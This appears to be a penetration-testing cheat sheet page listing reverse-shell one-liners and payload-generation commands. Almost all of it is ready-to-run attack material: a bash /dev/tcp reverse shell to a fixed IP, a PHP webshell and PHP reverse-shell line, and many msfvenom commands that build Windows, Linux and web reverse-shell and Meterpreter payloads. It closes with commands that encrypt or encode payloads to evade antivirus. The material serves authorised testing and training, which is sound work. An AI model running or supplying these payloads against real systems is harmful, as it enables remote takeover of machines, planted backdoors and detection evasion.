Reverse-shell-cheatsheet

Great resource for reverse shell creation in all possible languages:

Online - Reverse Shell Generatorwww.revshells.com

Linux

bash -i >& /dev/tcp/172.25.167.7/8000 0>&1

PHP

#Webshell
system($_GET[0]);
#Reverse Shell
exec("/bin/bash -c 'bash -i >& /dev/tcp/PWNIP/PWNPO 0>&1'");

Msfvenom

Create a simple reverse tcp shell executable

msfvenom -p windows/shell_reverse_tcp LHOST=<your_IP> LPORT=<your_port> -f exe > shell.exe

Non-Meterpreter Reverse Shells

Stageless Payloads for Windows (Works with netcat)

x86

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe

x64

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe

Stageless Payloads for Linux (Works with netcat)

x86

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf

x64

msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf

Staged Payloads for Windows

x86

msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe

x64

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe

Staged Payloads for Linux

x86

msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf

x64

msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf

Non-Meterpreter Web Payloads

asp

msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp

jsp

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp

war

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war

php

msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php

Meterpreter Binaries

Staged Payloads for Windows

x86

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe

x64

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe

Staged Payloads for Linux

x86

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf

x64

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf

Stageless Payloads for Linux

x86

msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf

x64

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf

Stageless Payloads for Windows

x86

msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe

x64

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe

Meterpreter Web Payloads

asp

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp

jsp

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > example.jsp

war

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > example.war

php

msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php

Payload Encryption and Customization

Payload Encryption

To obfuscate the payload and evade (some) antivirus detection, you can use payload encryption.

Example: Encrypting a payload

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe --encrypt xor --encrypt-key <KEY> > encrypted_shell.exe

Replace with a custom key for XOR encryption.

Payload Customization

Use various obfuscation techniques to make your payload less detectable by security tools.

Example - Obfuscating a payload with Shikata Ga Nai

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe -e x86/shikata_ga_nai > obfuscated_shell.exe

Consider adjusting payload properties to fit specific scenarios. For example, changing the sleep time to delay beacon intervals.

Example -Modifying sleep time for a Windows reverse shell

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe --platform windows --arch x86 --smallest --encrypt xor --encrypt-key <KEY> --sleep 10 > custom_shell.exe

Replace <KEY> with a custom key and adjust the sleep time as needed.

Credits:

Reverse Shell Cheat Sheetpentestmonkey

GitHub - duck-sec/msfvenom-revshell-cheatsheet: Cheatsheet for common MSFVenom payloads.GitHub

MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter)Infinite Logins

PreviousCommon installation issues NextMetasploit cheatsheet

Last updated 1 month ago

hashtagGreat resource for reverse shell creation in all possible languages:

hashtagLinux

hashtagPHP

hashtagMsfvenom

hashtagNon-Meterpreter Reverse Shells

hashtagNon-Meterpreter Web Payloads

hashtagMeterpreter Binaries

hashtagMeterpreter Web Payloads

hashtagPayload Encryption and Customization

hashtagPayload Encryption

hashtagPayload Customization

hashtagCredits: